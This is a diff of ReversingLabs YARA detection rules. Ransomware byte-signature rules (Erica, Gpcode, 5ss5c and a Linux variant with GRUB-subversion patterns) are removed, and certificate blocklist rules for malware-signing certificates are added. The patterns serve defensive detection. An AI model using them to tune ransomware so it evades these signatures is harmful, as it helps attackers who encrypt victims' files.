$search_files = { - 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 - 89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8 - ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? - ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? - E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 - ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? - ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? - ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 - D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ?? - ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 - 66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 - C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D - 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ?? - 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? - ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? - 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 - } - $subvert_grub_1 = { - 55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8 - ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 - ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? - ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? - ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 - ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 - ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? - ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? - ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? - ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 - } - $subvert_grub_2 = { - 48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? - ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? - ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 - 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? - ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ?? - ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? - ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 - E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? - ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ?? - ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85 - } - $subvert_grub_3 = { - 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? - ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? - ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? - ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ?? - ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 - 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? - ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? - 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? - ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 - ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? - ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D - ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D - B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B - 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 - } - condition: - uint32(0)==0x464C457F and ($search_files and ( all of ($encrypt_files_*)) and ( all of ($subvert_grub_*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dialer Access" and pe.signatures[i].serial=="09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE { meta: - description = "Yara rule that detects Erica ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "38f57157-bd49-5a63-8c69-497eb9efe274" - date = "2020-07-15" - modified = "2020-07-15" + id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13022-L13038" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Erica" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 - ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ?? - ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50 - 8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50 - E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? - 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50 - 8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ?? - ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A - 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files_p2 = { - 8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0 - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33 - C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9 - E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B - 40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8 - ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? - 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? - E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A - ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ?? - ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB - ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? - ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ?? - ?? ?? C3 - } - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89 - 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF - 30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? - 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 - ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? - ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CPM Media, Ltd." and pe.signatures[i].serial=="3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "eeccb477-0bf7-5b79-94df-710e6e0db78f" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13040-L13056" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE { meta: - description = "Yara rule that detects Gpcode ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "168833dd-44ab-59e1-a610-b9219b2907ff" - date = "2020-07-15" - modified = "2020-07-15" + id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13058-L13074" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GPCode" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $drive_loop = { - B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80 - C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D - } - $encrypt_routine = { - FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10] - E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ?? - ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? - ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) - ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ?? - [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? - 75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8 - } - $set_ransom_wallpaper = { - 0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ?? - B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F - 59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33 - C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? (E8 | FF 15) - } - $read_config_file = { - 55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? - ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ?? - E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF - 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 - 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 - 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 - 33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75 - ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? - 6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B - 45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ?? - ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13076-L13092" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures[i].serial=="7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE { meta: - description = "Yara rule that detects 5ss5c ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c69f44de-8e48-518d-87bf-d21d11223a2f" - date = "2020-07-15" - modified = "2020-07-15" + id = "8ac60604-6548-5f11-bf89-ec7e927b20f7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13094-L13110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "5ss5c" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1 - 8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ?? - 89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 - ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? - 57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D - ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ?? - ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 - 45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? 